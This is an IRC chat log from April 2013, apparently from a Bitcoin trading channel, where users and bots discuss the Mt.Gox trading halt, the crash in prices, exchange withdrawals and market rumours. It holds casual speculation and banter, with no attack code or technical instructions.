Apr 11 20:04:02 discretionary funding Apr 11 20:04:13 the bitcoin idea doesnt die Apr 11 20:04:18 if you kill one chain Apr 11 20:04:23 it would take 10 years just to get the idea signed off on Apr 11 20:04:27 bgupta it'd be about 100mn Apr 11 20:04:35 even then Apr 11 20:04:39 then 10 x over budget and it doesnt work Apr 11 20:04:39 they just split it Apr 11 20:04:45 people ignire the gov one Apr 11 20:04:48 I would think they could do very quickly, I think they would rather just use it as a tool to outlaw crytpo coins period though Apr 11 20:04:52 !ticker m s.mpoe Apr 11 20:04:54 [MPEX:S.MPOE] 1D: 0.00068433 / 0.00070408 / 0.000716 (215655 shares, 151.84 BTC), 7D: 0.00063322 / 0.00068976 / 0.000716 (1916705 shares, 1,322.07 BTC), 30D: 0.00059218 / 0.00068799 / 0.00077505 (9619968 shares, 6,618.52 BTC) Apr 11 20:05:11 its a losing battle before it starts Apr 11 20:05:32 Guessing they'd have to push through NSA, or some other black box budget Apr 11 20:05:36 litecoiners would be thrilled Apr 11 20:05:40 hehe Apr 11 20:05:51 I think there is a long battle ahead, I dont know who the victor will be but the fight is just beggining. Apr 11 20:06:00 ThickAsThieves: Litecoin has same vuln. Apr 11 20:06:07 right Apr 11 20:06:08 but Apr 11 20:06:15 they just keep building miners? Apr 11 20:06:20 Doffx has it. Apr 11 20:06:48 probly better ways to kill bitcoin Apr 11 20:07:10 regulate web traffic maybe Apr 11 20:07:26 need a license for botlike behavior Apr 11 20:07:26 Make people feel stupid for making a bad choice, that burn is enough to kill BTC. Apr 11 20:07:28 or such Apr 11 20:07:37 listen it will be a lot easier to get 100mn budget than to pass a law outtlawing bitcoin.. The problem with outlawing bitcoin, is that it gives bitcoin some credability and noteriety, and wouldn't kill it.. Apr 11 20:07:43 don't confuse your emotions with economics doffx Apr 11 20:08:04 What am I being emotional about? Apr 11 20:08:16 who said to outlaw it? Apr 11 20:08:21 maybe i have them on ignore already Apr 11 20:08:27 oh yeah that same burn killed gambling too Apr 11 20:08:35 lol Apr 11 20:08:39 Doffx said it ThickAsThieves Apr 11 20:09:05 what about what i said about web traffic Apr 11 20:09:06 Doffx: Make people feel stupid for making a bad choice, that burn is enough to kill BTC. Apr 11 20:09:13 feeling stupid about making a bad choice won't kill btc. Apr 11 20:09:14 Now BTC is gambling? I thought BTC and gambling were different. Apr 11 20:09:15 comcast sent me a warning when i started mining, Apr 11 20:09:38 Warning your compuer mayb be infected and is showing bit-like behavior Apr 11 20:09:40 it said Apr 11 20:09:46 bot-like* Apr 11 20:09:47 I was saying that the government could help do that bgupta Apr 11 20:10:14 [BTCTC] [ASICMINER-PT] 1 @ 0.725 BTC [-] Apr 11 20:10:16 that means mining is detectable Apr 11 20:10:19 and this preventable Apr 11 20:10:21 this* Apr 11 20:10:23 thus* Apr 11 20:10:28 ThickAsThieves: you should send them a warning back about tampering with http connections Apr 11 20:11:02 [HAVELOCK] [SDICE] 1 @ 0.32874999 BTC [+] Apr 11 20:11:03 [HAVELOCK] [SDICE] 10 @ 0.32875 = 3.2875 BTC [+] Apr 11 20:11:04 [HAVELOCK] [SDICE] 1 @ 0.32899999 BTC [+] Apr 11 20:11:04 ThickAsThieves: there are a number of ways to avoid that Apr 11 20:11:04 [HAVELOCK] [SDICE] 4 @ 0.329 = 1.316 BTC [+] Apr 11 20:11:05 [HAVELOCK] [SDICE] 8 @ 0.33 = 2.64 BTC [+] Apr 11 20:11:06 [HAVELOCK] [SDICE] 20 @ 0.341 = 6.82 BTC [+] Apr 11 20:11:07 [HAVELOCK] [SDICE] 31 @ 0.3415 = 10.5865 BTC [+] Apr 11 20:11:08 [HAVELOCK] [SDICE] 2 @ 0.342 = 0.684 BTC [+] Apr 11 20:11:09 [HAVELOCK] [SDICE] 2 @ 0.345 = 0.69 BTC [+] Apr 11 20:11:10 [HAVELOCK] [SDICE] 1 @ 0.348 BTC [+] Apr 11 20:11:11 [HAVELOCK] [SDICE] 25 @ 0.34999999 = 8.75 BTC [+] Apr 11 20:11:12 [HAVELOCK] [SDICE] 10 @ 0.35 = 3.5 BTC [+] Apr 11 20:11:13 [HAVELOCK] [SDICE] 52 @ 0.35 = 18.2 BTC [+] Apr 11 20:11:16 nice Apr 11 20:11:18 ie. use a VPN Apr 11 20:12:13 I was more trying to point out alternatives to just forking the chain with a 51% attack. Apr 11 20:12:30 forking doesnt kill it anyway Apr 11 20:12:38 just strikes confidence Apr 11 20:13:15 hi, does anyone have a good reading on current btc price as mtgox is not trading? Apr 11 20:13:22 clarkmoody? Apr 11 20:13:25 90-120 Apr 11 20:13:31 .. Apr 11 20:13:32 people Apr 11 20:13:33 80-110 Apr 11 20:13:36 there is no 'current price' Apr 11 20:13:46 the 'current price' is whatever price you're willing to buy or selli tat Apr 11 20:13:53 selling at* Apr 11 20:13:56 last price then Apr 11 20:14:01 oh 80 now Apr 11 20:14:05 ok, can you recommend a reasonable price? Apr 11 20:14:09 last price? wtf knows Apr 11 20:14:13 deals always going on Apr 11 20:14:17 ok the govt doesn't have to kill it kill it.. just needs to prevent it from becoming a threat Apr 11 20:14:20 Im looking at 5 different exchanges Apr 11 20:14:26 gl finding a good price haha Apr 11 20:14:39 allthough mtgox perhaps will do that for them Apr 11 20:15:00 http://i0.sinaimg.cn/gm/2013/0407/U8781P115DT20130407163218.jpg Apr 11 20:16:16 oh Apr 11 20:16:19 and for more reading Apr 11 20:16:26 this is why we can't carry water on to planes: http://www.techspot.com/news/52211-hacker-demonstrates-how-to-hijack-an-airplane-using-an-android-app.html Apr 11 20:16:33 water = dangerous Apr 11 20:16:40 phones that hack planes = not dangerous Apr 11 20:16:44 bugpowder can you pm me? Apr 11 20:20:03 [HAVELOCK] [SDICE] 18 @ 0.35 = 6.3 BTC [+] Apr 11 20:20:21 Great, now you wont be able to bring your phone on the plane either. Apr 11 20:20:58 ;;seen EskimoBob Apr 11 20:20:58 EskimoBob was last seen in #bitcoin-assets 3 hours, 23 minutes, and 25 seconds ago: look like this party i over Apr 11 20:21:03 [HAVELOCK] [VTX] 15 @ 0.31 = 4.65 BTC [+] Apr 11 20:21:07 i like this on the Mt Gox FB page 7 hours ago "Maintenance Over however we are now under a DDoS attack." Apr 11 20:22:41 [BTCTC] [ASICMINER-PT] 1 @ 0.75 BTC [+] Apr 11 20:24:06 gox queue at 13000 Apr 11 20:24:14 buy buy buy! Apr 11 20:24:17 :/ Apr 11 20:24:22 [MPEX] [S.DICE] 100 @ 0.00328798 = 0.3288 BTC [+] Apr 11 20:28:41 gox trading haulted until 2AM UTC? Apr 11 20:29:19 https://support.mtgox.com/entries/21519569-Market-Cooldown-for-12-hours Apr 11 20:29:41 where have you been? Apr 11 20:30:21 *halted Apr 11 20:30:31 pigeons: afk Apr 11 20:30:52 people blowing me up all fuckin night and day Apr 11 20:31:00 had enough Apr 11 20:32:54 [BTCTC] [COG.F] 1 @ 2 BTC [-] Apr 11 20:33:09 "Looks like MtGox not only froze trading but also bitcoin withdrawals, I've withdrawn 4 hours ago prior to trade being stopped and even though it shows the withdraw in my account, there is no record of it in the blockchain whatsoever." Apr 11 20:33:11 this a fact ? Apr 11 20:33:19 no Apr 11 20:33:23 i withdrew fine Apr 11 20:33:26 https://bitcointalk.org/index.php?topic=173433.msg1806337#msg1806337 Apr 11 20:36:57 [BTCTC] [ASICMINER-PT] 2 @ 0.73 = 1.46 BTC [-] Apr 11 20:37:00 [BTCTC] [ASICMINER-PT] 2 @ 0.73 = 1.46 BTC [-] Apr 11 20:38:44 [BTCTC] [BASIC-MINING] 2 @ 0.3989 = 0.7978 BTC [+] Apr 11 20:44:20 Lucif is calling $50 low Apr 11 20:44:32 he's cashed out though Apr 11 20:45:07 i came here to watch mircea_popescu get mad at mt gox Apr 11 20:45:17 Lyspooner lol you're late. Apr 11 20:45:22 Lyspooner: thats why we're all here Apr 11 20:45:41 heheh. im late too the party too. so don't feel bad. :] Apr 11 20:46:03 i'm having a very difficult time buying more coins at 250 Apr 11 20:46:03 what gives? Apr 11 20:46:14 haha Apr 11 20:46:16 lol Apr 11 20:46:35 still holding around 100 otc Apr 11 20:47:01 Lyspooner http://trilema.com/2013/in-which-noobs-learn-lessons-and-pay-for-the-privilege/ Apr 11 20:47:28 https://bitcointalk.org/index.php?topic=173512.msg1805951 also this is pretty lol Apr 11 20:48:03 [HAVELOCK] [SDICE] 1 @ 0.34999999 BTC [-] Apr 11 20:48:04 [HAVELOCK] [SDICE] 30 @ 0.35 = 10.5 BTC [+] Apr 11 20:48:38 funny how the btc that was exchange-crazed flows back to investments. Apr 11 20:48:43 nice blog post mp Apr 11 20:49:37 hopefully kicks some sense into ppls. Apr 11 20:50:17 this rabbit hole goes deep Apr 11 20:50:54 o look! mtgox is doing 70% of all bitcoin trades! Apr 11 20:51:22 nope 80% Apr 11 20:51:28 darn you didn't look quick enough and missed it. Apr 11 20:51:57 Bruce Wagner doesn't belong in that list Apr 11 20:52:02 [HAVELOCK] [HIM] 2 @ 1.54 = 3.08 BTC [+] Apr 11 20:52:16 not a victim or not of success ? Apr 11 20:52:36 i don't think he was conceited or deceitful (in bitcoinland) Apr 11 20:52:48 you know about his entire prior conviction thing right ? Apr 11 20:52:51 yes Apr 11 20:53:07 seems eerly similar to my taste. judge decided he didn't do anything Apr 11 20:53:07 so when does Mark Karpeles get on the list? Apr 11 20:53:12 [BTCTC] [ASICMINER-PT] 10 @ 0.725 = 7.25 BTC [-] Apr 11 20:53:14 he believes he's a victim of own success. Apr 11 20:59:52 [BTCTC] [GSDPT] 1 @ 0.00305 BTC [+] Apr 11 21:02:33 tiberiusiv I agree Apr 11 21:03:43 Erik are you all settled in now? Apr 11 21:03:59 as settled as one can be with this crazy market :) Apr 11 21:04:18 yeah intense Apr 11 21:05:24 so exante.eu is not retarded then? Apr 11 21:07:08 [BTCTC] [ASICMINER-PT] 1 @ 0.71 BTC [-] Apr 11 21:08:02 [HAVELOCK] [SDICE] 1 @ 0.37 BTC [+] Apr 11 21:11:13 mircea_popescu, what index do your options settle to again? linky Apr 11 21:11:21 $avg Apr 11 21:11:24 mircea_popescu: 148.34 Apr 11 21:14:06 [BTCTC] [ASICMINER-PT] 1 @ 0.705 BTC [-] Apr 11 21:14:12 [BTCTC] [ASICMINER-PT] 10 @ 0.701 = 7.01 BTC [-] Apr 11 21:14:16 [BTCTC] [ASICMINER-PT] 17 @ 0.7 = 11.9 BTC [-] Apr 11 21:14:23 [BTCTC] [ASICMINER-PT] 8 @ 0.698 = 5.584 BTC [-] Apr 11 21:14:30 [BTCTC] [ASICMINER-PT] 12 @ 0.697 = 8.364 BTC [-] Apr 11 21:14:33 [BTCTC] [ASICMINER-PT] 13 @ 0.696 = 9.048 BTC [-] Apr 11 21:14:33 calling it "massive irrational speculation" is very easy to do in hindsight Apr 11 21:14:35 [BTCTC] [ASICMINER-PT] 2 @ 0.695 = 1.39 BTC [-] Apr 11 21:14:41 indeed Apr 11 21:14:48 easy to do in foresight too Apr 11 21:15:02 good job then Apr 11 21:15:09 i think a lot of us just didnt realize it would happen on that exact day Apr 11 21:16:40 there were several people who called it a bubble at 70, say. Are those people wrong? Why should we only remember the people who got it right, like tiberiusiv? Apr 11 21:16:56 lol wut ? Apr 11 21:20:05 mircea_popescu: this asshat at icbit is a market manipulator just like you said Apr 11 21:20:20 o ? Apr 11 21:21:24 he's manually clearing his futures to artificially bring the price down to what he thinks is fair price Apr 11 21:21:56 heh Apr 11 21:21:58 I had buy orders in and he cleared it at lowest price of the trading range Apr 11 21:22:31 two times in 6 minutes Apr 11 21:22:47 [BTCTC] [ASICMINER-PT] 1 @ 0.6903 BTC [-] Apr 11 21:22:55 [BTCTC] [ASICMINER-PT] 1 @ 0.68 BTC [-] Apr 11 21:23:26 i bought shares in mpoe and was able to sell for a lot more than i bought them for at ipo Apr 11 21:23:37 i bought some more a few weeks ago and sold them all as well Apr 11 21:23:42 so thats not very accurate Apr 11 21:23:56 no thanks ;) Apr 11 21:24:06 that's not his bot, that's me Apr 11 21:24:13 [BTCTC] [ASICMINER-PT] 10 @ 0.75 = 7.5 BTC [+] Apr 11 21:24:22 [BTCTC] [S.DICE-PT] 115 @ 0.0033 = 0.3795 BTC [+] Apr 11 21:24:25 yes Apr 11 21:24:40 i mean i'm the one undercutting your asks Apr 11 21:24:41 then sell for a bid Apr 11 21:24:57 i'm pretty sure i am Apr 11 21:26:01 "@BryanMicon 9m If anyone wants to sell bitcoins I have a bunch of ppl calling me that want to buy" Apr 11 21:26:03 [MPEX] [S.DICE] 175 @ 0.00328797 = 0.5754 BTC [-] Apr 11 21:26:06 micon is starting his own exchange. Apr 11 21:28:12 could be buyiung actually Apr 11 21:28:33 who knows? lots of idiots on gox with wallets they couldn't transfer out Apr 11 21:29:10 I couldn't get money to btc-e... Apr 11 21:29:28 oh Apr 11 21:29:35 that works Apr 11 21:32:20 i thought btce was down for abit Apr 11 21:32:41 everyday but today Apr 11 21:32:47 lol Apr 11 21:33:47 lol Apr 11 21:33:55 they kept getting ddos'd fora while there Apr 11 21:34:26 they had some sensitive anti-ddos settings that were locking out their own customers for a while Apr 11 21:34:34 that got sorted a couple weeks ago Apr 11 21:34:49 i had to use tor a few times to access the site Apr 11 21:35:04 now the tor IPs are banned Apr 11 21:36:01 what the fuck Apr 11 21:36:02 [HAVELOCK] [VTX] 15 @ 0.302 = 4.53 BTC [-] Apr 11 21:36:48 just wake up? Apr 11 21:36:51 lol Apr 11 21:37:24 what happened to price lol Apr 11 21:38:03 [HAVELOCK] [VTX] 14 @ 0.3010101 = 4.2141 BTC [-] Apr 11 21:38:09 price got goxxed Apr 11 21:39:10 looks like 2011 just with some more zeros Apr 11 21:40:02 [HAVELOCK] [VTX] 16 @ 0.3001 = 4.8016 BTC [-] Apr 11 21:40:18 in 2011 it was hacked too Apr 11 21:40:19 the dream is over Apr 11 21:40:22 bitcoins are dead :-( Apr 11 21:40:55 What the hell is this? http://www.reddit.com/r/Bitcoin/comments/1c2u1x/operation_foolscoin/ OPERATION APRIL FOOLSCOIN Targets: MtGox, BTCE, Bitcoin24, Bitstamp Mission statement: The recent sell-off was only partially successful for several reasons: Fresh blood looking to buy Overly bullish market Only one exchange targeted April 1st occurs at the end of a bank holiday, fiat will be running low on the exchanges and it is the perfect time Apr 11 21:41:13 nonsense Apr 11 21:42:42 fuck 62 in bitstamp Apr 11 21:42:56 84 at btc-e Apr 11 21:43:05 120 at Gox LOL Apr 11 21:43:24 send money to slovenia- quick! Apr 11 21:43:35 *trLOL Apr 11 21:44:02 [HAVELOCK] [VTX] 6 @ 0.3 = 1.8 BTC [-] Apr 11 21:44:10 lippoper lol Apr 11 21:44:50 i'm already selling my bitstamp dollars to friends Apr 11 21:44:51 hehe Apr 11 21:44:52 54 on bitstamp Apr 11 21:45:25 110 on VTX Apr 11 21:45:55 hard to know how to play this when gox opens... Apr 11 21:47:01 I have some cash on Gox, I am going to put a big at 15 when it opens Apr 11 21:47:16 bid Apr 11 21:47:29 lol think it'll touch 15 ? Apr 11 21:47:54 panic dipshits with market orders Apr 11 21:48:01 maybe Apr 11 21:48:18 $50.05 83.04553425 $4,156.43 Apr 11 21:48:22 sellers on stamp Apr 11 21:48:45 you know - I wouldn't be surprised to see it go down to 25-30 and maybe stay there for a little while. Bubble have a funny way of popping... Apr 11 21:48:57 wow cheep coins Apr 11 21:49:10 pendulum swings all the way to the other side... Apr 11 21:49:13 u mean the price finding the real avg Apr 11 21:49:41 mkt. price circa Feb 2013? Apr 11 21:49:45 the real avg is $35 isn't it? Apr 11 21:50:00 we have a few months of fast money noobs to reset... Apr 11 21:50:10 35-50 Apr 11 21:50:38 < 50 seems enevitable to me... Apr 11 21:50:44 ;;nethash Apr 11 21:50:45 67544.3670323 Apr 11 21:50:50 it's not under 50 atm anywhere tho Apr 11 21:51:17 looking at my crystal ball Apr 11 21:51:25 its at 50 Apr 11 21:51:30 still possible taht those 15000 in gox q wanna sell not buy Apr 11 21:51:37 that's true. Apr 11 21:51:59 course it's also possible gox comes up with sorry hax Apr 11 21:52:03 and fades away Apr 11 21:52:09 I wonder if it will stil be 100 bitcoins for a avalon, lol Apr 11 21:52:09 in which case btc ---> 1 Apr 11 21:52:14 jborkl_ lol Apr 11 21:52:30 gox just has to last long enough to get my cash out 1k at a time Apr 11 21:52:32 :/ Apr 11 21:52:35 i guess nzhang guy has the chance of his life to show midnightmagic how ethical he is. Apr 11 21:52:39 structuring! Apr 11 21:52:58 you know, I've alway been suspicious of withdrawl limits - any chance that gox might be having a liquidity crisis or sorts? Apr 11 21:53:00 "we will sell these miners below cost nao" Apr 11 21:53:00 We have a announcment- we are pricing avalon in $ now Apr 11 21:53:12 pgp it's been suspected. Apr 11 21:53:30 without the smoking gun of them actually not payingh out anymore hard to prove. Apr 11 21:53:43 and they've had periods in the past when thery've held people's 10's of k's for weeks/months just cause Apr 11 21:53:51 well it was already easy to fake the order book Apr 11 21:53:55 so it'll be tough toi know they've run off even 3 months after the fact. Apr 11 21:54:01 just place lots of orders with an empty wallet Apr 11 21:54:10 joecool afaik those don't shopw Apr 11 21:54:25 no, they do not show up Apr 11 21:54:32 you'd need at least .01 btc Apr 11 21:55:27 ThickAsThieves: now that Mt.Cocks doesn't support Mt.Cocks cash coupons, people are selling out and/or withdrawing their funds from there. If they missed the chance, they are trying to get verified in order to be able to withdraw Apr 11 21:55:36 in USD Apr 11 21:55:46 https://bitcointalk.org/index.php?topic=173641.0 there you go^^ Apr 11 21:55:57 those thousands of new accounts could be people trying to get their USD out Apr 11 21:56:45 definately further downside... Apr 11 21:56:47 Uglux, it only makes sense that they're planning on freezing all the accounts Apr 11 21:56:51 [MPEX] [S.MPOE] 4427 @ 0.00071432 = 3.1623 BTC [+] Apr 11 21:57:00 including but not limited to all the currencies and coins in your wallet Apr 11 21:58:53 definately further downside... <<< i dunno about this mommentum mindset. Apr 11 21:59:03 at 240 people were "definitely more upside" now "definitely more downside" Apr 11 21:59:07 there's nothing definite here. Apr 11 21:59:14 Hello Apr 11 21:59:25 bitstamp 70 Apr 11 21:59:25 hi Apr 11 21:59:30 mircea_popescu, will you tolerate a AM PT? Apr 11 21:59:32 VTX 114 Apr 11 21:59:32 I have a question about bitbet Apr 11 21:59:54 Uglux what's that ? Apr 11 21:59:59 Rlx shoot Apr 11 22:00:46 I'm not absolutely sure if i bet on something, where can i check that out? Apr 11 22:00:52 i mean ann ASICMINER passthrough on mpex Apr 11 22:01:15 Rlx your receiving address should be on the bet Apr 11 22:01:20 you can also search for it on the site Apr 11 22:01:31 Uglux passthrough no. if they sign a contract they can be listed like anyone else. Apr 11 22:01:38 Oh ok, thank you Apr 11 22:01:41 obviously would recognise pt held shares. Apr 11 22:02:06 afaik everyone running pts already has accounts on mpex anyway so wouldn't be a big deal. Apr 11 22:04:11 [08:13:39] mtgox must go. <<< can't tell ya how many times I've heard this today....online and at home Apr 11 22:04:22 ya well... it's da truth Apr 11 22:04:26 haha got a reporter talking to me about icbit Apr 11 22:04:49 torn between discrediting bitcoin by trashing this exchange or ... Apr 11 22:04:56 I agree - I haven't actually used them for months now Apr 11 22:05:15 i don't think you're discrediting bitcoin by speaking the truth. Apr 11 22:05:20 at any juncture and in any context. Apr 11 22:05:22 agreed Apr 11 22:05:26 just make sure tis the truth. Apr 11 22:06:35 process the deposit/withdrawal queue please Mircea =P Apr 11 22:06:51 this channel is so much more calm about the drop today...lol - #bitcoin-otc is so full of stressball cases Apr 11 22:07:43 good riddance... Apr 11 22:07:54 although it's somewhat sad for them, really... Apr 11 22:08:02 People who lost money... Apr 11 22:08:09 is there a channel where mention of exchange rates to other currencies gets one banned Apr 11 22:08:12 weak hands Apr 11 22:08:19 life savings... divorces and suicides will probably occur... Apr 11 22:08:25 Namworld: you're running one of the Dice PTs on BTC-TC? but not the one on LTC-Global, correct? Apr 11 22:08:34 Correct Apr 11 22:08:35 don't invest more than you can lose peoples Apr 11 22:08:38 ^^^ Apr 11 22:08:59 Why would they stress out? Apr 11 22:09:08 This happens a lot in BTC Apr 11 22:09:11 Seriously... why do people who never touched/looked at BTC suddenly flock into it AFTER it raised a few hundred percents in value over a few weeks? Apr 11 22:09:12 $200/coin loss Apr 11 22:09:13 haha Apr 11 22:09:16 Guess we have all been through it a few times Apr 11 22:09:23 yeah Apr 11 22:09:29 [BTCTC] [ASICMINER-PT] 9 @ 0.75 = 6.75 BTC [+] Apr 11 22:09:30 micrea_popescu , deposit flush Apr 11 22:09:52 I let a client buy into the rally.......I really shoulda hedged her purchase....live & learn Apr 11 22:10:25 Thanks mircea Apr 11 22:10:27 but we damn sure won't let clients sell into a bottom feeding frenzy Apr 11 22:10:52 Namworld no, we're in a cool-off period right now Apr 11 22:11:12 cool off meaning taking bids out? Apr 11 22:11:31 mostly doing our hair. Apr 11 22:11:36 No, it's a joke... Apr 11 22:11:44 from MtGox freezing trades to "cool off" Apr 11 22:11:53 CPU got too hot Apr 11 22:11:57 from all the lag reuquests Apr 11 22:11:59 We're not crashing, we're "cooling off" Apr 11 22:12:06 bitcoin time-out Apr 11 22:12:09 lol Apr 11 22:12:09 lol kakobrekla Apr 11 22:12:15 Namworld i just meant re mpex processing withdrawals. Apr 11 22:12:30 oh Apr 11 22:12:44 !ticker m O.USD.P500T Apr 11 22:12:45 The eagle never lost so much time as when he submitted to learn from the crow. Apr 11 22:13:03 eheh,thought it was about the price crash and people losing money =P Apr 11 22:13:06 damnit assbot Apr 11 22:13:07 masybe that one never traded so not on the list mod6 Apr 11 22:13:09 and that you were quoting gox Apr 11 22:13:10 [MPEX] [S.DICE] 21551 @ 0.00328797 = 70.859 BTC [-] Apr 11 22:13:11 [MPEX] [S.DICE] 1400 @ 0.00328798 = 4.6032 BTC [+] Apr 11 22:13:15 lol assbot Apr 11 22:13:17 oh maybe Apr 11 22:13:22 [MPEX] [S.DICE] 2000 @ 0.00328799 = 6.576 BTC [+] Apr 11 22:13:24 [MPEX] [S.DICE] 1771 @ 0.003289 = 5.8248 BTC [+] Apr 11 22:13:26 daquq kinda answer was that Apr 11 22:13:35 alright, sdice rally Apr 11 22:13:44 woohoo Apr 11 22:13:53 guruvan you been gone for a long time eh Apr 11 22:14:06 let's all go bet what we have left on sdice, then erik can be stuck with our worthless btc... ;) Apr 11 22:14:31 [MPEX] [S.DICE] 3700 @ 0.00333328 = 12.3331 BTC [+] Apr 11 22:14:37 ya i wonder if high volatility correlates with high sdice betting Apr 11 22:14:38 is that why sdice going up? Apr 11 22:14:40 Why, tiberiusiv? Apr 11 22:15:03 I am honestly curious. Apr 11 22:15:08 [BTCTC] [ASICMINER-PT] 4 @ 0.75 = 3 BTC [+] Apr 11 22:15:09 because USD value goes down, BTC per bet goes up Apr 11 22:15:17 O.USD.P500T => S => Price: 2474007981 Volume: 1000 O.O Apr 11 22:15:18 [MPEX] [S.DICE] 2000 @ 0.00333328 = 6.6666 BTC [+] Apr 11 22:15:19 oh Apr 11 22:15:34 $depth p500t Apr 11 22:15:36 mircea_popescu: O.USD.P500T Bids: ['1000 @ 2.39515694'] Apr 11 22:15:37 mircea_popescu: Asks: ['1000 @ 24.74007981'] Apr 11 22:15:44 sweet lol Apr 11 22:15:46 So you are speculating that more people will be thus more profits for april? Apr 11 22:15:53 err bet* Apr 11 22:16:00 not more people Apr 11 22:16:02 larger bets Apr 11 22:16:05 in BTC Apr 11 22:16:17 Ahh ok Apr 11 22:18:40 kakobrekla: gone from IRC - not from bitcoin.....my house has crappy satellite internet, so IRC has been out of the question for a few months Apr 11 22:19:02 [HAVELOCK] [SDICE] 20 @ 0.35 = 7 BTC [-] Apr 11 22:20:16 hehe Lucif got a chart pic of the moments after 265 https://bitcointalk.org/index.php?topic=131065.msg1807696#msg1807696 Apr 11 22:23:45 [MPEX] [S.MPOE] 3989 @ 0.00070902 = 2.8283 BTC [-] Apr 11 22:25:15 and bitstamp is down.. Apr 11 22:25:44 bitfloor sub 60 Apr 11 22:25:56 just getting uglier and uglier Apr 11 22:26:28 [BTCTC] [ASICMINER-PT] 1 @ 0.75 BTC [+] Apr 11 22:28:02 [HAVELOCK] [HIM] 1 @ 1.6 BTC [+] Apr 11 22:28:18 ;;title https://bitcointalk.org/index.php?topic=173641.0 Apr 11 22:28:21 Mt.GOX Can't withdraw USD Apr 11 22:28:34 anyone have some bitstampUSD to sell? Apr 11 22:28:43 can anyone confirm? Apr 11 22:29:02 [HAVELOCK] [VTX] 22 @ 0.34 = 7.48 BTC [+] Apr 11 22:30:20 [MPEX] [S.DICE] 4570 @ 0.00333328 = 15.2331 BTC [+] Apr 11 22:30:22 [MPEX] [S.DICE] 6351 @ 0.00333333 = 21.17 BTC [+] Apr 11 22:30:39 [BTCTC] [ASICMINER-PT] 2 @ 0.76099 = 1.522 BTC [+] Apr 11 22:31:58 Namworld: I'd guess because they hadn't heard of it before. Apr 11 22:31:58 bitfloor 53 Apr 11 22:32:21 Scrat: i was able to withdraw to Dwolla just now from MtGox Apr 11 22:32:35 they have changed their withdrawal process though and didn't explain it well Apr 11 22:33:06 now to withdraw, first you have to "add a withdraw method" and then wait a while (like overnight) for it to become an option Apr 11 22:33:27 i think people are mistaking the inability to withdraw without going through this process for the inability to withdraw altogether Apr 11 22:33:39 it might be country specific Apr 11 22:33:49 i'm talking about USD Apr 11 22:33:57 well yeah Apr 11 22:34:03 [HAVELOCK] [VTX] 6 @ 0.300001 = 1.8 BTC [-] Apr 11 22:34:03 dwolla is only available in us Apr 11 22:34:14 but bank transfer still appears to be an option as well Apr 11 22:34:29 but again you have to "add a withdraw method" with the bank in advance Apr 11 22:35:15 SPLNKR: and have to be verified right? Apr 11 22:35:45 ;;ticker Apr 11 22:35:46 BTCUSD ticker | Best bid: 118.95000, Best ask: 124.90000, Bid-ask spread: 5.95000, Last trade: 124.90000, 24 hour volume: 211992.07740389, 24 hour low: 106.10000, 24 hour high: 203.00000, 24 hour vwap: 158.25213 Apr 11 22:35:51 not sure, most likely Apr 11 22:36:01 Are you verified with Mt.Gox? Apr 11 22:36:30 splnkr: are you verified? Apr 11 22:36:41 why Apr 11 22:37:01 (3:32:21 PM) splnkr: Scrat: i was able to withdraw to Dwolla just now from MtGox Apr 11 22:37:05 did I misread that? Apr 11 22:37:10 no. Apr 11 22:37:32 so you're not verified? Apr 11 22:37:57 what is your question about mtgox Apr 11 22:38:22 Do you have to be verified to withdraw using Dwolla today? Apr 11 22:38:47 gribble, where are those prices you just quoted? i'm seeing sub 60 bitstamp, bitfloor, bit24... Apr 11 22:39:17 they have to have dwolla funds available. they easily could be out and they have to add more Apr 11 22:39:18 bit_nutz_: the ticker is frozen on Gox and gribble is using their frozen data. Apr 11 22:39:36 [MPEX] [O.USD.P089T] 2 @ 0.78 = 1.56 BTC [+] Apr 11 22:39:45 thank you lippoper Apr 11 22:39:48 The price is sub 60? Apr 11 22:39:53 dwolla is only instant if you have funds on dwolla itself Apr 11 22:40:12 jborkl_: b.s. it's much more likely that splnkr is trolling Apr 11 22:40:27 oh ok,nm Apr 11 22:40:30 he was talking about withdrawing money OUT Apr 11 22:40:47 and can't even say yes/no if he's verified Apr 11 22:40:50 yeah, they have to add money to mutum sigglim Apr 11 22:40:56 or whatever the name is Apr 11 22:41:12 bitesak: i just saw a 53 print Apr 11 22:41:20 90% sure this guy is just confused Apr 11 22:41:24 all assets on mt.gox are frozen, not even btc transfers are actually being done. Apr 11 22:41:34 epic crash Apr 11 22:41:46 lippoper how do you know that ? Apr 11 22:41:51 i've heard reports both ways Apr 11 22:42:04 anbody know anything about these exante guys out of malta? Apr 11 22:42:16 pgp keiser's scamthing. Apr 11 22:42:37 mircea_popescu: keiser is connected with exante? Apr 11 22:42:45 really Apr 11 22:42:48 lippoper: i'm not confused. i explained the situation 10 mins ago you didn't read everything i wrote Apr 11 22:42:49 welllll.... he's pushing them Apr 11 22:43:38 he must have privately sold them their stash of coins, then... Apr 11 22:43:45 I just sent a small amount of btc to gox, see what happens Apr 11 22:43:45 @maxkeiser 10 Apr Apr 11 22:43:45 I'll be speaking at Exante.eu hedge fund conference in Portugal on May 24th. Whatever the price of BTC before this event: double it. Apr 11 22:43:46 @mircea: I think the reports saying they were able to get money/btc out are all fake, trying to prevent the bottom hitting. Apr 11 22:44:00 lippoper ThickAsThieves was saying earlier. i don't imagine he's faking it Apr 11 22:44:03 bit_nutz_ epic indeed ! Apr 11 22:44:13 but he did it right before they actually froze everything Apr 11 22:44:15 moreover they may have cut it off after he got it out Apr 11 22:44:34 maxkeiser 10 Apr Apr 11 22:44:34 I'm working with Exante.eu to broker deals getting London hedge funds into BTC. We've got more than $1 bn. lined up.#KeepMiningWeveGotOrders Apr 11 22:44:36 after 12 hours and I get 1 confirm- I will report back Apr 11 22:44:40 Lyspooner as you can see... retard. Apr 11 22:44:44 who in london even heard of him ? Apr 11 22:44:47 ;;ticker Apr 11 22:44:48 BTCUSD ticker | Best bid: 118.95000, Best ask: 124.90000, Bid-ask spread: 5.95000, Last trade: 124.90000, 24 hour volume: 208554.52358335, 24 hour low: 110.20003, 24 hour high: 203.00000, 24 hour vwap: 158.68466 Apr 11 22:44:49 in a professional capacity i mean. Apr 11 22:44:55 huh.. Apr 11 22:44:57 ;;goxlag Apr 11 22:44:57 MtGox lag is 9.530755 seconds. During this time, light travels 0.0190995263083 AU. You could have sent a bitcoin one full loop along the orbit of the Moon around Earth (0.016 AU). Apr 11 22:44:59 everything works in Gox except making orders Apr 11 22:45:01 ticker is wrong Apr 11 22:45:02 i thought he hit 55 dollatrs Apr 11 22:45:06 cancelling is tricky Apr 11 22:45:07 FUck Apr 11 22:45:07 I missed it! Apr 11 22:45:10 ME Apr 11 22:45:37 you have to click cancel on ONE order and just leave the window alone for a few mins Apr 11 22:45:41 then later reload Apr 11 22:45:47 and your order will be 